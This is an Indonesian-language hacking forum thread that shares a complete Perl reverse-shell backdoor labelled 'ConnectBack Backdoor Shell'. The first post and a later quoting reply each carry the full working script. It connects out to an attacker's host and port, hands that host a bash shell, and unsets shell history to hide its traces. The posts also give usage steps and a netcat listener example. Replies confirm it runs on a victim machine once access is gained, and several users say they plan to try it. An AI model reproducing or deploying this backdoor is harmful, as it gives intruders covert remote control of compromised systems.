(share)ConnectBack Backdoor Shell
#1
sore semua Big Grin ngabuburit nemu script begini di hardisk ahaha langsung ane bagi deh
nama scripnya ConnectBack Backdoor Shell buatan hacker iran lets cekidot

Quote:#!/usr/bin/perl
use IO::Socket;
# Priv8 ** Priv8 ** Priv8
# IRAN HACKERS SABOTAGE Connect Back Shell
# code by:LorD
# We Are :LorD-C0d3r-NT-\x90
# Email:[email protected]
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/bash';
$ARGC=@ARGV;
print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF

save dengan nama terserah yg penting format .pl

jalaninnya gini om

root@bt:~# chmod +x backconnect.pl
root@bt:~# ./connectback.pl
--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--

Usage: dc.pl [Host] [Port]

Ex: connectback.pl 127.0.0.1 2121

ok sekian dan termakasih Big Grin

#2
Ini backdoor kan ya om? jalaninnya dari pc target bukan kalo gt?

#3
ada tut cara gunainnya nggak omz... biar lebih enak gitu omz... Smile

#4
Nice share, +1 dari ane Smile

(07-21-2012, 04:53 PM)xCode Wrote: Ini backdoor kan ya om? jalaninnya dari pc target bukan kalo gt?

yup betul sekali, kita harus punya akses di target dulu Smile

(07-21-2012, 05:29 PM)5forA Wrote: ada tut cara gunainnya nggak omz... biar lebih enak gitu omz... Smile

dibagian bawah udah ada tuh, itu skrip pada dasarnya menjalankan netcat di port 2121, hampir semua linux memiliki netcat, jd klo temen2 punya server linux pastikan netcatnya dihapus hehehe

#5
ini baru mantep gk usah susah2 lgi , comot lgsung praktek om ,kakwakwak

#6
(07-21-2012, 05:29 PM)5forA Wrote: ada tut cara gunainnya nggak omz... biar lebih enak gitu omz... Smile

Quote: dibagian bawah udah ada tuh, itu skrip pada dasarnya menjalankan netcat di port 2121, hampir semua linux memiliki netcat, jd klo temen2 punya server linux pastikan netcatnya dihapus hehehe

thaks omz untuk penjelasannya.... jadi pengen coba langsung nih... Angel


#7
Thanks om ikons udh di bantu penjelasanya Big Grin mongo yo kita belajar bareng disni Smile

#8
(07-21-2012, 04:24 PM)xsan-lahci Wrote: sore semua Big Grin ngabuburit nemu script begini di hardisk ahaha langsung ane bagi deh
nama scripnya ConnectBack Backdoor Shell buatan hacker iran lets cekidot

Quote:#!/usr/bin/perl
use IO::Socket;
# Priv8 ** Priv8 ** Priv8
# IRAN HACKERS SABOTAGE Connect Back Shell
# code by:LorD
# We Are :LorD-C0d3r-NT-\x90
# Email:[email protected]
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/bash';
$ARGC=@ARGV;
print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF

save dengan nama terserah yg penting format .pl

jalaninnya gini om

root@bt:~# chmod +x backconnect.pl
root@bt:~# ./connectback.pl
--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--

Usage: dc.pl [Host] [Port]

Ex: connectback.pl 127.0.0.1 2121

ok sekian dan termakasih Big Grin

#9
walaupun belum begitu ngerti, tapi sepertinya ini menarik ._. ijin comot scriptnya om , siapa tau suatu hari nanti berguna :v
Jangan Makan Tulang Kawan | Kurawa |

#10
bedanya dengan menggunakan weevley apa mas...?






Users browsing this thread: 1 Guest(s)